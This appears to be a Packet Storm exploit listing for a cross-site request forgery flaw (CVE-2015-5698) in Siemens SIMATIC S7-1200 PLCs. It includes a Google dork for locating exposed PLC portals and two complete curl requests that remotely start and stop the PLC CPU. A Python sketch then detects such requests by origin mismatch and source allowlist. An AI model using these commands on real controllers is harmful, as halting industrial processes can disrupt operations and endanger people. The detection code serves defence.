ID: PACKETSTORM:172315
Author: RoseSecurity
Published: May 15, 2023

Siemens SIMATIC S7-1200 Cross Site Request Forgery

Source: packetstormsecurity.com
Tags: siemens, simatic s7-1200, cross site request forgery, exploit, rosesecurity, plc, vulnerability, command injection, cve-2015-5698, kali linux, security advisory

EPSS: 0.014 (Low), percentile 86.2%

```bash
# Exploit Title: Siemens SIMATIC S7-1200 CPU Start/Stop Command- Cross-Site Request Forgery
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2022-03-24
# Exploit Author: RoseSecurity
# Vendor Homepage: https://www.siemens.com/global/en.html
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
# Tested on: Kali Linux
# CVE: CVE-2015-5698

# IP == PLC IP address

# Start Command

curl -i -s -k -X $'POST' \
  -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \
  -b $'siemens_automation_no_intro=TRUE' \
  --data-binary $'Run=1&PriNav=Start' \
  'http://<IP>/CPUCommands'

# Stop Command

curl -i -s -k -X $'POST' \
  -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \
  -b $'siemens_automation_no_intro=TRUE' \
  --data-binary $'Run=1&PriNav=Stop' \
  'http://<IP>/CPUCommands'
```
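A detection sketch for the requests above, added here as an example and not part of the original advisory or of any Siemens tooling: it flags POSTs to `/CPUCommands` whose `Origin`/`Referer` host differs from the `Host` header, or whose source is not an approved engineering station. The record field names, the allowlist and the addresses are assumptions; the sample records are constructed.

```python
from urllib.parse import parse_qs, urlsplit

COMMAND_PATH = "/CPUCommands"        # endpoint used by the requests above
ENGINEERING_HOSTS = {"10.0.5.20"}    # assumed allowlist of engineering stations

# Constructed sample records, not captured traffic. The field names are
# assumptions about what an HTTP-aware sensor in front of the PLC would log.
SAMPLE_REQUESTS = [
    {"src": "10.0.5.20", "method": "POST", "host": "192.0.2.10", "path": COMMAND_PATH,
     "origin": "http://192.0.2.10", "body": "Run=1&PriNav=Start",
     "referer": "http://192.0.2.10/Portal/Portal.mwsl?PriNav=Start"},
    {"src": "10.0.5.20", "method": "POST", "host": "192.0.2.10", "path": COMMAND_PATH,
     "origin": "http://wiki.example.test", "body": "Run=1&PriNav=Stop",
     "referer": "http://wiki.example.test/page"},
    {"src": "10.0.9.77", "method": "POST", "host": "192.0.2.10", "path": COMMAND_PATH,
     "origin": "http://192.0.2.10", "body": "Run=1&PriNav=Stop",
     "referer": "http://192.0.2.10/Portal/Portal.mwsl?PriNav=Start"},
    {"src": "10.0.5.20", "method": "GET", "host": "192.0.2.10",
     "path": "/Portal/Portal.mwsl?PriNav=Start"},
]

def _host(url):
    """Hostname of an Origin/Referer value, or None if the header is absent."""
    return urlsplit(url).hostname if url else None

def classify(req, allowed=ENGINEERING_HOSTS):
    """Return findings for one request; an empty list means nothing to report."""
    if req["method"] != "POST" or urlsplit(req["path"]).path != COMMAND_PATH:
        return []
    findings = []
    target = req["host"].split(":")[0].lower()   # drop an optional port (IPv4/name only)
    claimed = _host(req.get("origin")) or _host(req.get("referer"))
    if claimed is None:
        findings.append("no-origin-or-referer")
    elif claimed != target:
        findings.append("cross-site-origin")     # browser was driven from another site
    # Origin and Referer can be forged by a non-browser client, so the source
    # address check is what catches a direct request like the curl commands above.
    if req["src"] not in allowed:
        findings.append("source-not-allowlisted")
    return findings

def scan(requests):
    """Return (source, parsed command parameters, findings) for each flagged request."""
    return [(r["src"], parse_qs(r.get("body", "")), classify(r))
            for r in requests if classify(r)]

if __name__ == "__main__":
    for src, params, findings in scan(SAMPLE_REQUESTS):
        print(src, params, findings)
```
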
